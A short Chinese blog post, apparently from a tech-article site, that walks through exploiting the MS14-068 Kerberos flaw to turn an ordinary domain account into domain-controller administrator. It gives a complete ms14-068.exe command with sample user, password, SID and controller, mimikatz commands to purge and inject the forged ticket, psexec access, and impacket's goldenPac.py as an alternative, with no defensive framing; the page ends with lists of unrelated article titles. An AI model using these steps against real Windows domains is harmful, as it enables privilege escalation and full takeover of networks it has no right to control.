ms14-068提权

工具利用

a)拿下边界机win7，并已经有win7上任意一个账号的密码

-u 用户名@域

-p 用户密码

-s 用户sid

-d 域控

ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com

生成一个ccache后缀票据

导入票据

导入之前，清空票据缓存

kerberos::purge

kerberos::ptc 票据

使用psexec工具连接win08（域控机器）尝试执行命令，看到的权限是test3的，但是实际上所属已经是win08上，并且是最高权限

impacket工具包提权

b) 没拿到边界机，但是有账号密码的情况

使用/impacket/examples下的goldenpac.py脚本

注意@domain-host 指的是域控机的位置

成功进入win08的命令行模式

最新文章

1. SQL Server的AlwaysOn错误19456和41158
2. Android 广播 BroadcastReceiver
3. NSBundle UIImageView &UIButton
4. String对象中常用的方法
5. [转]C++常见内存错误汇总
6. 关于NGUI中的自适应和对齐机制
7. [转]freemaker格式化日期
8. 分享一个linux和linux的文件传输【scp无密码传输】
9. 周根项《一分钟速算》全集播放&下载地址
10. CentOS6.5 安装mysql5.6.30
11. 浏览器F12进行Web程序调试
12. 让你变懒的 Android Studio Live Templates
13. J2ee入门：servlet-mapping的映射配置
14. Linux集群时间同步方法
15. 通过ClickOnce本地打包发布WPF应用程序
16. this 相关
17. ASP.NET Core MVC+EF Core从开发到部署
18. JQuery加载列表实现动画滚动（自上而下挤）
19. ORM、SQLAchemy
20. 解决java.lang.IllegalStateException: The application’s PagerAdapter changed the adapter’s content

热门文章

1. [洛谷 P5053] [COCI2017-2018#7] Clickbait
2. 「 从0到1学习微服务SpringCloud 」06 统一配置中心Spring Cloud Config
3. 资源| 学习视频库-永久有效,持续更新!附赠java面试汇总
4. 从txt文本内读取数据（逐行读取），执行循环
5. oc---instancetype和id的异同
6. Jconsole或者VisualVM监控远程主机(阿里云,jdk11或者8)
7. mybatis入门案例自定义实现
8. P4语言环境安装（一）前端编译器p4c、后端编译器p4c-bm2-ss
9. 如何快速打好Java基础？
10. HDU_2571_DP